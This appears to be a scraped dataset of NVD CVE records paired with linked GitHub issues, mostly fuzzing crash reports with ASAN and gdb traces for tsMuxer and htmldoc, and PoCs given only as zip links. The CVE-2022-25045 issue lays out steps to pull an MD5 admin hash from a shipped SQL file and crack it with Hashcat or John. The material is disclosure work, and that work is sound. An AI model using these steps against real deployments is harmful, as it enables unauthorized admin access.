{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/476" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/480" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/476" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/480" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:*:*:*:*:*:*:*:*", "matchCriteriaId": "05AA1A0C-51F5-46F3-A82E-5E73923E2877", "versionEndExcluding": "2021-10-19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/justdan96/tsMuxer/issues/476
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, I found a segmentation fault. **Some info:** ``` Ubuntu 20.04.3 LTS tsMuxeR version git-c6a0277 ``` **To reproduce** 1. Compile tsMuxer 2. Run tsmuxer ``` tsmuxer ./poc ``` **POC** [poc.zip](https://github.com/justdan96/tsMuxer/files/7365611/poc.zip) **ASAN output:** ``` tsMuxeR version git-c6a0277. github.com/justdan96/tsMuxer AddressSanitizer:DEADLYSIGNAL ================================================================= ==381734==ERROR: AddressSanitizer: SEGV on unknown address 0x7ebc3a9ff810 (pc 0x5606ac8c6ded bp 0x7ffff6e52500 sp 0x7ffff6e52410 T0) ==381734==The signal is caused by a READ memory access. #0 0x5606ac8c6dec in DTSStreamReader::findFrame(unsigned char*, unsigned char*) tsMuxer/tsMuxer/dtsStreamReader.cpp:193 #1 0x5606aca7930c in SimplePacketizerReader::checkStream(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) tsMuxer/tsMuxer/simplePacketizerReader.cpp:247 #2 0x5606ac9969e8 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) tsMuxer/tsMuxer/metaDemuxer.cpp:751 #3 0x5606ac994d60 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) tsMuxer/tsMuxer/metaDemuxer.cpp:685 #4 0x5606ac93e057 in detectStreamReader(char const*, MPLSParser*, bool) tsMuxer/tsMuxer/main.cpp:120 #5 0x5606ac945bfd in main tsMuxer/tsMuxer/main.cpp:699 #6 0x7f4e420360b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x5606ac8540ed in _start (tsMuxer/build/tsMuxer/tsmuxer+0x28d0ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV tsMuxer/tsMuxer/dtsStreamReader.cpp:193 in DTSStreamReader::findFrame(unsigned char*, unsigned char*) ==381734==ABORTING ``` **gdb** ``` gdb-peda$ r ./poc Starting program: tsMuxer/build/tsMuxer/tsmuxer ./poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". tsMuxeR version git-c6a0277. github.com/justdan96/tsMuxer Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x7f6df393b020 RBX: 0x1 RCX: 0x7ffff393b010 ("AUPRINFO\377\377\377n") RDX: 0xffffff6e00000010 RSI: 0x7ffff393b010 ("AUPRINFO\377\377\377n") RDI: 0x0 RBP: 0x7fffffff70f0 --> 0x7fffffff71a0 --> 0x7fffffffd380 --> 0x7fffffffd850 --> 0x7fffffffda30 --> 0x7fffffffe220 (--> ...) RSP: 0x7fffffff7090 --> 0x1 RIP: 0x5555556eb065 (<_ZN15DTSStreamReader9findFrameEPhS0_+69>: mov rax,QWORD PTR [rax]) R8 : 0x5555556eb020 (<_ZN15DTSStreamReader9findFrameEPhS0_>: endbr64) R9 : 0x0 R10: 0x22 ('"') R11: 0x246 R12: 0x5555556bac00 (<_start>: endbr64) R13: 0x7fffffffe310 --> 0x2 R14: 0x0 R15: 0x0 EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x5555556eb059 <_ZN15DTSStreamReader9findFrameEPhS0_+57>: mov rax,QWORD PTR [rbp-0x50] 0x5555556eb05d <_ZN15DTSStreamReader9findFrameEPhS0_+61>: mov QWORD PTR [rbp-0x20],rax 0x5555556eb061 <_ZN15DTSStreamReader9findFrameEPhS0_+65>: mov rax,QWORD PTR [rbp-0x20] => 0x5555556eb065 <_ZN15DTSStreamReader9findFrameEPhS0_+69>: mov rax,QWORD PTR [rax] 0x5555556eb068 <_ZN15DTSStreamReader9findFrameEPhS0_+72>: mov QWORD PTR [rbp-0x38],rax 0x5555556eb06c <_ZN15DTSStreamReader9findFrameEPhS0_+76>: lea rax,[rbp-0x38] 0x5555556eb070 <_ZN15DTSStreamReader9findFrameEPhS0_+80>: mov rdi,rax 0x5555556eb073 <_ZN15DTSStreamReader9findFrameEPhS0_+83>: call 0x555555805f87 <_Z9my_ntohllRKm> [------------------------------------stack-------------------------------------] 0000| 0x7fffffff7090 --> 0x1 0008| 0x7fffffff7098 --> 0x7ffff393b068 --> 0x0 0016| 0x7fffffff70a0 --> 0x7f6df393b020 0024| 0x7fffffff70a8 --> 0x7fffffff74e0 --> 0x5555558c4d60 --> 0x5555556bd57a (<_ZN24BaseAbstractStreamReader17writeAdditionDataEPhS0_R8AVPacketPSt6vectorISt4pairIiiESaIS5_EE>: endbr64) 0032| 0x7fffffff70b0 --> 0x7fffffff8260 --> 0x555555906910 --> 0x0 0040| 0x7fffffff70b8 --> 0x6effffff 0048| 0x7fffffff70c0 --> 0x0 0056| 0x7fffffff70c8 --> 0x7fffffff8500 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00005555556eb065 in DTSStreamReader::findFrame(unsigned char*, unsigned char*) () gdb-peda$ bt #0 0x00005555556eb065 in DTSStreamReader::findFrame(unsigned char*, unsigned char*) () #1 0x000055555579f491 in SimplePacketizerReader::checkStream(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) () #2 0x00005555557424fe in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) () #3 0x0000555555741afb in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) () #4 0x000055555571ca8a in detectStreamReader(char const*, MPLSParser*, bool) () #5 0x000055555571fafc in main () #6 0x00007ffff799f0b3 in __libc_start_main (main=0x55555571ed30 <main>, argc=0x2, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #7 0x00005555556bac2e in _start () gdb-peda$ ```
segmentation fault in dtsStreamReader.cpp:193 DTSStreamReader::findFrame
https://api.github.com/repos/justdan96/tsMuxer/issues/476/comments
1
2021-10-18T14:12:22Z
2022-06-23T07:14:29Z
https://github.com/justdan96/tsMuxer/issues/476
1,029,175,684
476
3,269
CVE-2022-25050
2022-03-02T00:15:08.250
rtl_433 21.12 was discovered to contain a stack overflow in the function somfy_iohc_decode(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/merbanan/rtl_433/commit/2dad7b9fc67a1d0bfbe520fbd821678b8f8cc7a8" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/merbanan/rtl_433/issues/1960" }, { "source": "cve@mitre.org", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/6c9cd35f-a206-4fdf-b6d1-fcd50926c2d9/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/merbanan/rtl_433/commit/2dad7b9fc67a1d0bfbe520fbd821678b8f8cc7a8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/merbanan/rtl_433/issues/1960" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/6c9cd35f-a206-4fdf-b6d1-fcd50926c2d9/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rtl_433_project:rlt_433:21.12:*:*:*:*:*:*:*", "matchCriteriaId": "706EE005-D69A-444F-9F6D-DFDB877D2A52", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/merbanan/rtl_433/issues/1960
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "merbanan", "rtl_433" ]
Hey there! I belong to an open source security research community, and a member (@aug5t7) has found an issue, but doesn’t know the best way to disclose it. If not a hassle, might you kindly add a `SECURITY.md` file with an email, or another contact method? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc @huntr-helper)
Responsible disclosure policy
https://api.github.com/repos/merbanan/rtl_433/issues/1960/comments
6
2022-01-24T12:23:29Z
2022-02-03T10:53:20Z
https://github.com/merbanan/rtl_433/issues/1960
1,112,577,948
1,960
3,270
CVE-2022-25045
2022-03-02T21:15:08.313
Home Owners Collection Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/VivekPanday12/CVE-/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.linkedin.com/in/vivek-panday-796768149/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/VivekPanday12/CVE-/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.linkedin.com/in/vivek-panday-796768149/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home_owners_collection_management_system_project:home_owners_collection_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FDB75A84-7EE7-4D4A-9B5F-77365D793307", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/VivekPanday12/CVE-/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "VivekPanday12", "CVE-" ]
CVE-2022-25045 Exploit Title: Home Owners Collection Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access Exploit Author: VIVEK PANDAY Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html Tested on Windows10 Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149 Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. [Attack Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept 1 Download source code from https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html 2 Now unzip it and go to the Database folder here we can see one SQL file. 3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.
CVE-2022-25045 Home Owners Collection Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access
https://api.github.com/repos/VivekPanday12/CVE-/issues/6/comments
0
2022-02-09T09:00:10Z
2022-05-18T10:22:16Z
https://github.com/VivekPanday12/CVE-/issues/6
1,128,242,995
6
3,271
CVE-2021-23180
2022-03-02T23:15:08.283
A flaw was found in htmldoc in v1.9.12 and before. Null pointer dereference in file_extension(),in file.c may lead to execute arbitrary code and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967041" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/19c582fb32eac74b57e155cffbb529377a9e751a" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/418" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-23180" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967041" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/19c582fb32eac74b57e155cffbb529377a9e751a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/418" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-23180" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9DD956F-44F8-4CB5-B9FD-9269C3E931F2", "versionEndExcluding": null, "versionEndIncluding": "1.9.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/michaelrsweet/htmldoc/issues/418
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found aSEGV in file_extension function in file.c:337:29 - test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: htmldoc -f demo.pdf poc8.html poc(zipped for update): [poc8.zip](https://github.com/michaelrsweet/htmldoc/files/5872256/poc8.zip) ``` ================================================================= ==38294==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000059da5a bp 0x7fff321dba90 sp 0x7fff321d9150 T0) ==38294==The signal is caused by a WRITE memory access. ==38294==Hint: address points to the zero page. #0 0x59da59 in file_extension /home//htmldoc_sani/htmldoc/file.c:337:29 #1 0x5521fc in pdf_write_links(_IO_FILE*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:3424:26 #2 0x5521fc in pdf_write_document(unsigned char*, unsigned char*, unsigned char*, unsigned char*, unsigned char*, unsigned char*, tree_str*, tree_str*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:2295 #3 0x5521fc in pspdf_export /home//htmldoc_sani/htmldoc/ps-pdf.cxx:910 #4 0x53c845 in main /home//htmldoc_sani/htmldoc/htmldoc.cxx:1291:3 #5 0x7f91f2fee0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #6 0x41f8bd in _start (/home//htmldoc_sani/htmldoc/htmldoc+0x41f8bd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home//htmldoc_sani/htmldoc/file.c:337:29 in file_extension ==38294==ABORTING ``` ``` ─ source:file.c+337 ──── 332 if (strchr(extension, '#') == NULL) 333 return (extension); 334 335 strlcpy(buf, extension, sizeof(buf)); 336 // buf=0x00000000004602f0 → "<P>Click on this image: <A HRnnnnnnnnnnnnnnnnnnnn" → 337 *(char *)strchr(buf, '#') = '\0'; 338 339 return (buf); 340 } 341 342 ── threads ──── [#0] Id 1, Name: "htmldoc", stopped 0x42a338 in file_extension (), reason: SIGSEGV ─── trace ──── [#0] 0x42a338 → file_extension(s=<optimized out>) [#1] 0x412309 → pdf_write_links(out=<optimized out>) [#2] 0x412309 → pdf_write_document(author=<optimized out>, creator=<optimized out>, copyright=<optimized out>, keywords=<optimized out>, subject=<optimized out>, lang=<optimized out>, doc=<optimized out>, toc=<optimized out>) [#3] 0x412309 → pspdf_export(document=<optimized out>, toc=<optimized out>) [#4] 0x408e89 → main(argc=<optimized out>, argv=<optimized out>) ``` reporter: chiba of topsec alphalab
AddressSanitizer: SEGV in file_extension file.c:337:29
https://api.github.com/repos/michaelrsweet/htmldoc/issues/418/comments
2
2021-01-26T09:02:25Z
2022-03-11T05:20:30Z
https://github.com/michaelrsweet/htmldoc/issues/418
794,056,743
418
3,272
CVE-2021-23191
2022-03-02T23:15:08.347
A security issue was found in htmldoc v1.9.12 and before. A NULL pointer dereference in the function image_load_jpeg() in image.cxx may result in denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967022" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/369b2ea1fd0d0537ba707f20a2f047b6afd2fbdc" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/415" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-23191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967022" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/369b2ea1fd0d0537ba707f20a2f047b6afd2fbdc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/415" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-23191" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9DD956F-44F8-4CB5-B9FD-9269C3E931F2", "versionEndExcluding": null, "versionEndIncluding": "1.9.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/michaelrsweet/htmldoc/issues/415
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found SEGV on unknown address test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: ``` htmldoc -f demo.pdf poc4.html ``` poc(zipped for update): [poc4.zip](https://github.com/michaelrsweet/htmldoc/files/5872179/poc4.zip) ``` ================================================================= ==38160==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000014 (pc 0x7fd7b98ce259 bp 0x000000000001 sp 0x7ffcf67f15c0 T0) ==38160==The signal is caused by a WRITE memory access. ==38160==Hint: address points to the zero page. #0 0x7fd7b98ce258 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x21258) #1 0x7fd7b98cbf1e (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1ef1e) #2 0x7fd7b98c3f2e in jpeg_consume_input (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x16f2e) #3 0x7fd7b98c41b1 in jpeg_read_header (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x171b1) #4 0x5c06dd in image_load_jpeg(image_t*, _IO_FILE*, int, int) /home//htmldoc_sani/htmldoc/image.cxx:1357:3 #5 0x5c06dd in image_load /home//htmldoc_sani/htmldoc/image.cxx:824 #6 0x5a8f6f in compute_size(tree_str*) /home//htmldoc_sani/htmldoc/htmllib.cxx:3239:11 #7 0x5a1d63 in htmlReadFile /home//htmldoc_sani/htmldoc/htmllib.cxx:981:11 #8 0x53eb98 in read_file(char const*, tree_str**, char const*) /home//htmldoc_sani/htmldoc/htmldoc.cxx:2492:9 #9 0x539ce3 in main /home//htmldoc_sani/htmldoc/htmldoc.cxx:1177:7 #10 0x7fd7b93610b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x41f8bd in _start (/home//htmldoc_sani/htmldoc/htmldoc+0x41f8bd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x21258) ==38160==ABORTING ``` ``` [#0] 0x7ffff7ef5259 → mov DWORD PTR [rbx+0x14], r14d [#1] 0x7ffff7ef2f1f → mov r12d, eax [#2] 0x7ffff7eeaf2f → jpeg_consume_input() [#3] 0x7ffff7eeb1b2 → jpeg_read_header() [#4] 0x5c06de → image_load_jpeg(img=0x619000000080, fp=<optimized out>, gray=<optimized out>, load_data=0x0) [#5] 0x5c06de → image_load(filename=0x603000000190 "/var/tmp/041944.000001.tmp", gray=0x0, load_data=0x0) [#6] 0x5a8f70 → compute_size(t=0x608000001c20) [#7] 0x5a1d64 → htmlReadFile(parent=<optimized out>, fp=0x615000000300, base=0x7fffffffcbe0 "./pocs_htmldoc") [#8] 0x53eb99 → read_file(filename=<optimized out>, document=0x7fffffffd180, path=<optimized out>) [#9] 0x539ce4 → main(argc=0x4, argv=0x7fffffffdd38) ``` reporter: chiba of topsec alphalab
AddressSanitizer: SEGV on unknown address 0x000000000014
https://api.github.com/repos/michaelrsweet/htmldoc/issues/415/comments
7
2021-01-26T08:50:41Z
2022-03-11T05:12:06Z
https://github.com/michaelrsweet/htmldoc/issues/415
794,049,235
415
3,273
CVE-2021-23206
2022-03-02T23:15:08.460
A flaw was found in htmldoc in v1.9.12 and prior. A stack buffer overflow in parse_table() in ps-pdf.cxx may lead to execute arbitrary code and denial of service.
